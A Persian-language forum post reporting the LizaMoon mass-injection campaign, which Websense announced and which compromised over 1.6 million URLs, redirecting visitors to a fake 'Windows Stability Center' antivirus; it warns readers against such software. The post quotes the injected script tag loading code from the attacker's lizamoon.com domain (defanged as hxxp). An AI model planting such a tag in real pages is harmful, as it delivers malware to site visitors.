mass-injection با نام LizaMoon بیش از یک میلیون URL را آلوده کرد

Radars

Member
لابراتوار امنیتی Websense خرابکاری از نوع mass-injection را که آن را LizaMoon می نامد اعلام کرد. URL اینجکت شده lizamoon.com می باشد و به همین LizaMoon نام گرفت.

در این حمله این دستور در صفحه قرار داده می شود:
<script src=hxxp://lizamoon.com/ur.php></script>

xu404w1uos3wlowxtin.jpg



بر اساس جستجوی گوگل تا این لحظه که توسط رادار گزارش داده می شود تعداد URL های مورد حمله قرار گرفته به حدود ۱,۶۹۰,۰۰۰ رسیده است.این حمله در تاریخ ۲۹ مارس شناسایی شده است و یکی از وسیع ترین حملات در نوع خود تا کنون می باشد و رشد خود را همچنین دارد ادامه می دهد.



tjby21x38g32csbeicor.jpg

نتایج جستجوی گوگل برای URLهای مورد حمله قرار گرفته​



روش مورد استفاده به این صورت است که اسکریپت inject شده کاربر را به یک سایت آنتی ویروس جعلی هدایت می نماید، و از آنها می خواهد یک آنتی ویروس جعلی با نام Windows Stability Center را نصب نمایند. در تاریخ ۲۹ مارس تعداد آدرسهای مورد حمله توسط Websense به تعداد ۲۸۰۰۰ اعلام شد ولی رشد باورنکردنی پیدا کرده است. تعداد زیادی از آدرسهای مربوط به iTunes بودند ولی به دلیل انکد کردن اسکریپت توسط iTunes، سیستم کاربران با این حمله مشکلی نخواهند داشت و حمله خنثی می گردد.

با توجه به رشد و عدم وجود نشانه ای در کاهش سرعت رشد آن، پیشنهاد می شود تا برنامه های آنتی ویروس تحت وب که به شما می گویند کامپیوتر شما دارای باگ می باشد را نصب ننمایید.

f5hguexji4m4cw0dqcr8.jpg

صفحه اول سایت جعلی Windows Stability Center


f7w6tgsoh7g2rbpuawwj.jpg

نمونه سایت جعلی Windows Stability Center​
 

جدیدترین ارسال ها

بالا